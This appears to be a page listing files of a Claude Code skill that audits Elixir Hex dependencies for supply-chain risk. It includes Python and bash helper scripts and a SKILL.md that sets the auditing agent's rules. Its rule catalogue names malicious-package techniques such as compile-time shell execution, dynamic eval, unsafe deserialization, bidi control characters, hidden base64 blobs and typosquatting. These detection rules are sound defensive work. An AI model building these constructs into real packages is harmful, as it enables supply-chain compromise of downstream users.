          p.add_argument("--dropped-out", default="dropped_signals.jsonl")
          p.add_argument(
              "--added-package-mode",
              choices=("emit-all", "skip"),
              default="emit-all",
              help="how to handle an absent --old (default: emit-all = Phase 1 behavior)",
          )
          args = p.parse_args(argv)
      
          new_path = Path(args.new)
          old_path = Path(args.old) if args.old else None
      
          new = load_ndjson(new_path)
          if old_path is None or not old_path.exists() or not load_ndjson(old_path):
              if args.added_package_mode == "skip":
                  print(
                      f"diff_findings: no OLD findings; --added-package-mode=skip → 0 signals",
                      file=sys.stderr,
                  )
                  write_ndjson(Path(args.new_out), [])
                  write_ndjson(Path(args.info_out), [])
                  write_ndjson(Path(args.dropped_out), [])
                  return 0
              all_new = [dict(f, differential="new") for f in new]
              write_ndjson(Path(args.new_out), all_new)
              write_ndjson(Path(args.info_out), [])
              write_ndjson(Path(args.dropped_out), [])
              print(
                  f"diff_findings: no OLD; emitted {len(all_new)} signals as NEW",
                  file=sys.stderr,
              )
              return 0
      
          old = load_ndjson(old_path)
          new_signals, info_signals, dropped = diff(new, old)
          n_new = write_ndjson(Path(args.new_out), new_signals)
          n_info = write_ndjson(Path(args.info_out), info_signals)
          n_dropped = write_ndjson(Path(args.dropped_out), dropped)
          print(
              f"diff_findings: {n_new} new, {n_info} carried/info, {n_dropped} dropped",
              file=sys.stderr,
          )
          return 0
      
      
      if __name__ == "__main__":
          sys.exit(main(sys.argv[1:]))
      
    • fetch_tarball.sh 3.1 KB
      #!/usr/bin/env bash
      # scripts/fetch_tarball.sh — fetch real Hex tarballs into the local cache.
      # Used by /phx:deps-vet (single-vet) and by calibration runs against the
      # benign corpus; the offline smoke fixtures never call it.
      #
      # Usage:
      #   bash scripts/fetch_tarball.sh phoenix 1.7.21
      #   bash scripts/fetch_tarball.sh --batch batch.txt   # "<pkg> <version>" per line
      #   bash scripts/fetch_tarball.sh --prune  # drop tarballs >30 days old
      #
      # Cache layout:
      #   ${AUDIT_TMPDIR}/corpus/<pkg>/<version>/
      #     ├── <pkg>-<version>.tar          # raw Hex tarball
      #     └── contents/                    # extracted source
      #
      # Soft dependency: requires a Mix project context for `mix hex.package fetch`.
      # If invoked outside a Mix project, falls back to direct repo.hex.pm download.
      
      set -u
      
      CACHE_ROOT="${HEX_AUDIT_CACHE:-${HOME}/.cache/phx-deps-audit/corpus}"
      mkdir -p "${CACHE_ROOT}"
      
      fail() { echo "fetch: $*" >&2; exit 1; }
      info() { echo "fetch: $*" >&2; }
      
      fetch_one() {
        local pkg="$1" ver="$2"
        local dest="${CACHE_ROOT}/${pkg}/${ver}"
        if [ -d "${dest}/contents" ]; then
          info "cached: ${pkg} ${ver}"
          return 0
        fi
        mkdir -p "${dest}/contents"
      
        if command -v mix >/dev/null 2>&1 && [ -f mix.exs ]; then
          # In a Mix project — use the canonical tool.
          mix hex.package fetch "${pkg}" "${ver}" --output "${dest}/${pkg}-${ver}.tar" \
            --unpack >/dev/null 2>&1 || fail "mix hex.package fetch failed for ${pkg} ${ver}"
          # mix --unpack writes to a folder named ${pkg}-${ver}/; move into contents/
          if [ -d "${dest}/${pkg}-${ver}" ]; then
            mv "${dest}/${pkg}-${ver}"/* "${dest}/contents/" 2>/dev/null || true
            rmdir "${dest}/${pkg}-${ver}" 2>/dev/null || true
          fi
        else
          # Fallback: download tarball directly via curl. No checksum verification
          # at this level — production audits validate via hex_metadata.config.
          local url="https://repo.hex.pm/tarballs/${pkg}-${ver}.tar"
          info "no mix project; falling back to direct download ${url}"
          curl -fsSL "${url}" -o "${dest}/${pkg}-${ver}.tar" \
            || fail "curl failed for ${pkg} ${ver}"
          (cd "${dest}/contents" && tar -xf "../${pkg}-${ver}.tar") \
            || fail "tar extraction failed for ${pkg} ${ver}"
          # Hex inner archive is contents.tar.gz inside the outer tar
          if [ -f "${dest}/contents/contents.tar.gz" ]; then
            tar -xzf "${dest}/contents/contents.tar.gz" -C "${dest}/contents/" \
              || fail "inner contents.tar.gz extraction failed"
          fi
        fi
        info "fetched: ${pkg} ${ver}"
      }
      
      prune() {
        # Drop tarballs older than 30 days (cache TTL).
        find "${CACHE_ROOT}" -type d -mtime +30 -exec rm -rf {} + 2>/dev/null || true
        info "pruned entries older than 30 days"
      }
      
      main() {
        case "${1:-}" in
          --prune) prune ;;
          --batch)
            [ -f "$2" ] || fail "batch file not found: $2"
            while IFS=' ' read -r pkg ver; do
              [ -z "${pkg}" ] && continue
              [[ "${pkg}" =~ ^# ]] && continue
              fetch_one "${pkg}" "${ver}"
            done < "$2"
            ;;
          '')
            fail "usage: fetch_tarball.sh <pkg> <version> | --batch <file> | --prune"
            ;;
          *)
            [ -n "${2:-}" ] || fail "version required"
            fetch_one "$1" "$2"
            ;;
        esac
      }
      
      main "$@"
      
    • findings_to_sarif.py 5.5 KB
      #!/usr/bin/env python3
      """
      findings_to_sarif.py — emit SARIF 2.1.0 from phx-deps-audit NDJSON.
      
      Reads one NDJSON file (Phase 2 `new_signals.jsonl` by default; supply
      `findings.jsonl` when running --no-differential), writes a SARIF log
      to the path given as the second argument.
      
      Each input line is a JSON object with at minimum: rule_id, severity,
      optionally: file, line, snippet, message, package, version,
      previous_version, differential.
      
      Usage:
          python3 findings_to_sarif.py <findings.jsonl> <out.sarif> [--plugin-version 3.0.0]
      
      Output: SARIF 2.1.0 JSON conforming to
          https://json.schemastore.org/sarif-2.1.0.json
      """
      
      import argparse
      import json
      import sys
      from pathlib import Path
      
      LEVELS = {"block": "error", "warn": "warning", "info": "note"}
      KINDS = {"block": "fail", "warn": "fail", "info": "informational"}
      
      RULE_DESCRIPTIONS = {
          1: ("BidiUnicodeControlChar", "Bidi Unicode control char in source",
              "Detects directional-override Unicode control characters in source files (Trojan Source CVE-2021-42574)."),
          2: ("DynamicEvalAtModuleScope", "Code.eval_* or :erlang.apply with non-literal MFA",
              "Detects evaluator calls with runtime-determined target at module scope."),
          3: ("CompileTimeShellExec", "System.cmd / :os.cmd / Port.open at compile time",
              "Detects shell-exec calls in compile-time macros."),
          4: ("UnsafeBinaryToTerm", ":erlang.binary_to_term/1 on literal without :safe",
              "Detects unsafe deserialization without the :safe option."),
          5: ("NewNonHexDep", "New :git or :path dep in mix.exs",
              "Detects dependencies that bypass the Hex registry."),
          6: ("MaintainerChange", "Maintainer change between versions",
              "Detects Hex package ownership change between the audited and previous version."),
          7: ("LargeBase64Blob", "Base64 blob >256 chars outside priv/static/, test/fixtures/, assets/",
              "Detects suspiciously large base64 strings in source."),
          8: ("TyposquatCandidate", "Typosquat candidate (Levenshtein + download delta)",
              "Detects packages with names ≤2 edits from top-500 and >1000x download delta."),
      }
      
      
      def rule_definition(rule_id: int) -> dict:
          name, short, full = RULE_DESCRIPTIONS.get(
              rule_id,
              (f"Rule{rule_id}", f"Rule {rule_id}", f"phx-deps-audit rule {rule_id}"),
          )
          return {
              "id": f"phx-deps-audit/rule-{rule_id}",
              "name": name,
              "shortDescription": {"text": short},
              "fullDescription": {"text": full},
              "helpUri": (
                  "https://github.com/oliver-kriska/claude-elixir-phoenix/blob/main/"
                  f"plugins/elixir-phoenix/skills/deps-audit/references/heuristics.md#rule-{rule_id}"
              ),
              "defaultConfiguration": {"level": "error"},
          }
      
      
      def finding_to_result(f: dict) -> dict:
          rule_id = f["rule_id"]
          severity = f.get("severity", "warn")
          package = f.get("package", "")
          version = f.get("version", "")
      
          region = {"startLine": int(f.get("line") or 1)}
          if f.get("snippet"):
              region["snippet"] = {"text": f["snippet"]}
      
          loc = {
              "physicalLocation": {
                  "artifactLocation": {"uri": f.get("file") or "mix.exs"},
                  "region": region,
              }
          }
          if package:
              loc["logicalLocations"] = [
                  {"name": package, "kind": "package"},
                  {"name": version, "kind": "version"},
              ]
      
          return {
              "ruleId": f"phx-deps-audit/rule-{rule_id}",
              "level": LEVELS.get(severity, "warning"),
              "kind": KINDS.get(severity, "fail"),
              "message": {"text": f.get("message") or RULE_DESCRIPTIONS.get(rule_id, ("", "", ""))[1]},
              "locations": [loc],
              "properties": {
                  "package": package,
                  "version": version,
                  "previous_version": f.get("previous_version", ""),
                  "differential": f.get("differential", "new"),
              },
          }
      
      
      def load_ndjson(path: Path) -> list[dict]:
          if not path.exists():
              return []
          out = []
          with path.open() as fh:
              for raw in fh:
                  raw = raw.strip()
                  if not raw:
                      continue
                  out.append(json.loads(raw))
          return out
      
      
      def build_sarif(findings: list[dict], plugin_version: str) -> dict:
          rule_ids = sorted({f["rule_id"] for f in findings})
          return {
              "$schema": "https://json.schemastore.org/sarif-2.1.0.json",
              "version": "2.1.0",
              "runs": [
                  {
                      "tool": {
                          "driver": {
                              "name": "phx-deps-audit",
                              "version": plugin_version,
                              "informationUri": "https://github.com/oliver-kriska/claude-elixir-phoenix",
                              "rules": [rule_definition(rid) for rid in rule_ids],
                          }
                      },
                      "results": [finding_to_result(f) for f in findings],
                  }
              ],
          }
      
      
      def main(argv: list[str]) -> int:
          p = argparse.ArgumentParser(description="Convert phx-deps-audit NDJSON to SARIF 2.1.0")
          p.add_argument("findings", type=Path, help="NDJSON findings file")
          p.add_argument("out", type=Path, help="SARIF output path")
          p.add_argument("--plugin-version", default="3.0.0", help="Plugin version for tool.driver.version")
          args = p.parse_args(argv)
      
          findings = load_ndjson(args.findings)
          sarif = build_sarif(findings, args.plugin_version)
          args.out.write_text(json.dumps(sarif, indent=2) + "\n")
          print(f"sarif: {len(findings)} findings → {args.out}", file=sys.stderr)
          return 0
      
      
      if __name__ == "__main__":
          sys.exit(main(sys.argv[1:]))
      
  • SKILL.md 9.2 KB
    ---
    name: deps-audit
    description: Audit Hex deps for supply-chain security risk — bidi chars, compile-time exec, maintainer changes, typosquats, CVEs. Use after mix deps.update, when checking if a package upgrade is safe, or reviewing mix.lock PR diffs.
    effort: medium
    argument-hint: "[--base <ref> | --preview [pkg...]] [--quick] [--json] [--sarif <path>] [--ci] [--strict] [--no-differential] [--no-llm | --llm] [--trace]"
    ---
    
    # Hex Dependency Audit
    
    Non-mutating supply-chain audit for Hex packages. Runs an 8-rule MVP catalogue
    against changed packages, enriches with Hex API metadata, wraps existing tools
    (`mix hex.audit`, `mix_audit`, OSV-Scanner), and emits a triage table.
    
    ## When to Use
    
    - After `mix deps.update` or `mix deps.get` brought in new versions
    - On PRs that touch `mix.lock` (pre-merge gate)
    - Before manually updating a single package (`--preview <pkg>`)
    - When investigating a dependency you don't recognize
    
    ## Iron Laws
    
    1. **NEVER claim a diff is clean without inspecting it.** Run all 8 rules
       on the unpacked NEW tarball. "Looks fine" without a tool run is a false
       pass. **Always write `.claude/deps-audit/last-run.json`** — its absence
       is evidence the audit didn't actually run.
    2. **NEVER install `mix_audit` / `osv-scanner` — even if asked.** Detect,
       warn with install instructions, skip cleanly if missing. If the user
       says "install it," respond with the install command (e.g.,
       `mix deps.add mix_audit --only dev`) and **do not execute it**. The
       audit skill is non-mutating; `mix.exs` / `mix.lock` are off-limits
       regardless of consent.
    3. **NEVER promote a finding to BLOCK without rule citation.** Every finding
       shows `rule_id`, `severity`, `file:line`, `snippet`, `message`. No
       handwaving.
    4. **NEVER fetch from Hex API without rate-limiting.** Cap at 5 req/sec.
       Cache metadata 7 days, top-500 list 1 day.
    5. **NEVER run the audit on already-committed lock changes silently** —
       tell the user which mode (A/B/C) is active and which `(old, new)` pairs
       resolved.
    6. **LLM triage only above threshold.** Native rules + Semgrep + YARA
       are deterministic. The `hex-deps-triager` agent runs only when score
       > 10 (1 BLOCK or 3+ WARNs), and its verdicts are advisory — never
       auto-suppress a finding without human review.
    
    ## Operating Modes
    
    | Mode | Trigger | Old source | New source |
    |------|---------|-----------|-----------|
    | **B** (default) | `/phx:deps-audit` | `git show HEAD:mix.lock` | working `mix.lock` |
    | **C** (PR) | `/phx:deps-audit --base main` | `git show <ref>:mix.lock` | working `mix.lock` |
    | **A** (preview) | `/phx:deps-audit --preview httpoison` | locked version | Hex API latest |
    
    See `${CLAUDE_SKILL_DIR}/references/operating-modes.md` for full resolver logic.
    
    ## Execution Flow
    
    Default = full 8-rule scan with streaming progress. `--quick` opts out
    to CVE + retirement only. See `${CLAUDE_SKILL_DIR}/references/execution-flow.md`.
    
    ### Step 1: Resolve the diff
    
    Parse the `mix.lock` Erlang term format for both old and new sources. Emit a
    list of `{pkg, old_version, new_version}` tuples. Surface
    new-only and removed-only packages separately (a removed package is not
    audited; a brand-new package gets `old_version = nil` and skips diff-only
    rules).
    
    See `${CLAUDE_SKILL_DIR}/references/diff-resolver.md` for shell + `mix run -e` snippets per mode and the JSON output contract.
    
    ### Step 2: Fetch tarballs (per-run tmpdir)
    
    For each `(pkg, old, new)`:
    
    ```
    mix hex.package fetch <pkg> <old> --unpack -o ${AUDIT_TMPDIR}/tarballs/<pkg>/<old>/
    mix hex.package fetch <pkg> <new> --unpack -o ${AUDIT_TMPDIR}/tarballs/<pkg>/<new>/
    ```
    
    All ephemeral artifacts live under `${AUDIT_TMPDIR}` (driver-owned, removed
    on exit). See `${CLAUDE_SKILL_DIR}/references/audit-tmpdir.md` and
    `${CLAUDE_SKILL_DIR}/references/tarball-fetcher.md`.
    
    ### Step 3: Run the 8 MVP rules on each NEW tarball
    
    | # | Rule | Sev | Method |
    |---|------|-----|--------|
    | 1 | Bidi Unicode control chars in `.ex`/`.exs`/`.erl` | BLOCK | grep |
    | 2 | `Code.eval_*` / `:erlang.apply` with non-literal MFA at module scope | BLOCK | AST (Sourceror or regex+scope) |
    | 3 | `System.cmd` / `:os.cmd` / `Port.open` at compile time | BLOCK | AST |
    | 4 | `:erlang.binary_to_term/1` on literal without `:safe` | BLOCK | AST |
    | 5 | New `:git`/`:path` dep in `mix.exs` (vs old) | BLOCK | AST diff |
    | 6 | Maintainer change between versions | BLOCK | Hex API |
    | 7 | Base64 blobs >256 chars outside `priv/static/`, `test/fixtures/`, `assets/` | WARN | regex |
    | 8 | Levenshtein ≤2 from top-500 + download delta >1000× | BLOCK | Hex API + fuzzy |
    
    Full catalogue (35 rules, MVP marked) in `${CLAUDE_SKILL_DIR}/references/heuristics.md`.
    Bash + `mix run -e` implementations for all 8 MVP rules in
    `${CLAUDE_SKILL_DIR}/references/rules-impl.md` (single-pass NEW + diff rules +
    Hex API rules, with `run_all_rules` master loop).
    
    ### Step 4: External tool wrappers (parallel)
    
    - `mix hex.audit` — retired-package check, always available
    - `mix_audit` — CVE check via GHSA, if installed (else warn + skip; do NOT install)
    - `osv-scanner` — CVE check via OSV.dev, if installed (else warn + skip; do NOT install)
    
    See `${CLAUDE_SKILL_DIR}/references/external-tools.md` for detection, output parsing, and severity mapping per tool.
    
    ### Step 5: Hex API enrichment (per package)
    
    - `GET /api/packages/:name` — owners, downloads, inserted_at
    - `GET /api/packages/:name/releases/:version` — per-release publisher
    - Compute: `days_since_publish`, `owner_age_days`, `download_velocity`
    
    Cap at 5 req/sec. Per-run cache under `${AUDIT_TMPDIR}/hex-api/`.
    See `${CLAUDE_SKILL_DIR}/references/hex-api.md` for endpoint contracts,
    caching strategy, Rule 6/8 detection, and Levenshtein implementation.
    
    ### Step 5.5: Apply `hex_vet.exs` ledger (if present)
    
    If `hex_vet.exs` exists at project root, vetted-version findings are
    **downgraded to INFO**. Unvetted versions retain their severity.
    Lock-vs-ledger disagreement: lock wins. See the deps-vet skill's
    hex-vet schema doc for the "Lock-vs-ledger disagreement" section.
    
    Use `/phx:deps-vet <pkg> <version>` (separate skill) to add entries.
    
    ### Step 5.7: Differential subtract
    
    When run with `DIFFERENTIAL=1` (default), findings that existed in the
    OLD tarball are downgraded to INFO. Net-new signals reach the renderer
    at full severity. See `${CLAUDE_SKILL_DIR}/references/differential.md`.
    
    ### Step 5.8: LLM triage (when score > threshold)
    
    For packages where the aggregate score exceeds 10, the
    `hex-deps-triager` sonnet agent reads finding + diff windows and
    produces structured verdicts (`confidence`, `verdict`, `rationale`,
    `fp_reasons[]`). A `context-supervisor` consolidates verdicts
    across packages into `triage/consolidated.md`. Main skill reads only
    the consolidated file.
    
    See `${CLAUDE_SKILL_DIR}/references/llm-triage.md`.
    
    ### Step 6: Score & render
    
    Per-package weighted sum: BLOCK = 10, WARN = 3, INFO = 1.
    Risk band: 0 clean · 1–5 low · 6–15 medium · 16+ high.
    
    Output:
    
    1. **Stdout:** markdown table — `pkg | old → new | risk | findings | diff.hex.pm | maintainer-change` plus a per-package detail section for any non-clean row.
    2. **Sidecar (MANDATORY):** Write `.claude/deps-audit/last-run.json`. The Phase 3 gate reads this; an audit that doesn't write it is a no-op for the gate. Always emit, even on clean runs.
    
    `--json` flag emits JSON to stdout instead of markdown. See
    `${CLAUDE_SKILL_DIR}/references/output-renderer.md` for table format,
    sidecar schema, exit-code rubric, and `--quiet` mode.
    
    ## Out of scope / Phase 3 surface
    
    - **NEVER modify** `mix.lock`, `mix.exs`, or any project file (non-mutating)
    - **NEVER auto-install** missing tools (warn + skip)
    - **Gate** `mix deps.{get,update,compile}` via `deps-audit-gate.sh`. See `${CLAUDE_SKILL_DIR}/references/hook.md`.
    - **Prompt** for `/phx:compound` after BLOCK findings — corpus self-feeds.
    - **Emit** SARIF 2.1.0 via `--sarif <path>` and gate CI via `--ci`.
    
    ## References
    
    - `${CLAUDE_SKILL_DIR}/references/heuristics.md` — full 35-rule catalogue
    - `${CLAUDE_SKILL_DIR}/references/rules-impl.md` — bash + `mix run -e` for the 8 MVP rules
    - `${CLAUDE_SKILL_DIR}/references/operating-modes.md` — Mode A/B/C resolver
    - `${CLAUDE_SKILL_DIR}/references/diff-resolver.md` — shell snippets, lock parser
    - `${CLAUDE_SKILL_DIR}/references/tarball-fetcher.md` — fetch wrapper, parallel cap, cache prune
    - `${CLAUDE_SKILL_DIR}/references/external-tools.md` — `mix_audit`, `osv-scanner` wrappers
    - `${CLAUDE_SKILL_DIR}/references/hex-api.md` — endpoint contracts, rate limit, Rule 6/8
    - `${CLAUDE_SKILL_DIR}/references/output-renderer.md` — markdown, JSON v1, exit codes, SARIF
    - `${CLAUDE_SKILL_DIR}/references/testing.md` — smoke runner, fixture matrix
    - `${CLAUDE_SKILL_DIR}/references/differential.md` / `llm-triage.md` — Phase 2 NDJSON subtract + triager
    - `${CLAUDE_SKILL_DIR}/references/semgrep.md` / `yara.md` — Phase 2 precision layers (soft deps)
    - `${CLAUDE_SKILL_DIR}/references/cassettes.md` / `sarif.md` / `hook.md` / `ci-integration.md` — Phase 3 surface
    - `${CLAUDE_SKILL_DIR}/references/trusted-publishers.md` / `skill-checklist.md` — upstream + eval
    - `${CLAUDE_SKILL_DIR}/references/audit-tmpdir.md` — Phase 5 per-run ephemeral storage contract
    - `${CLAUDE_SKILL_DIR}/references/execution-flow.md` / `differential-cve.md` — Phase 5 default scan + CVE diff
    

Comments (0)

Sign in to join the conversation.

No comments yet.

Reviews (0)

No reviews yet.

Related